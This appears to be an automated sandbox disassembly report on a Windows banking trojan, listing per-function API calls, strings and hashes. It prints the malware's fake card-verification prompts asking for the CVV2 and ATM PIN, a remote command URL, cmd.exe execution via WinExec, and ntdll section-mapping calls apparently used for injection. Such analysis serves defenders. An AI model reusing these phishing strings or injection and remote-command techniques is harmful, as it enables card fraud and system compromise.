                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 004068B0 Relevance: 61.5, APIs: 22, Strings: 13, Instructions: 221stringprocessfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 407 406aad-406aef sprintf call 407a04 lstrlenA 404->407 408 406a27-406a61 DeleteFileA sprintf WinExec 405->408 406->408 411 406b17-406b1e 407->411 408->398 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            Function 004052E0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 115sleepstringprocessCOMMON
                            Download Yara Rule
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            Function 00401B9F Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 487memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            Function 00402822 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 004037AA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            Function 004054D7 Relevance: 15.1, APIs: 10, Instructions: 109stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmpDownload File
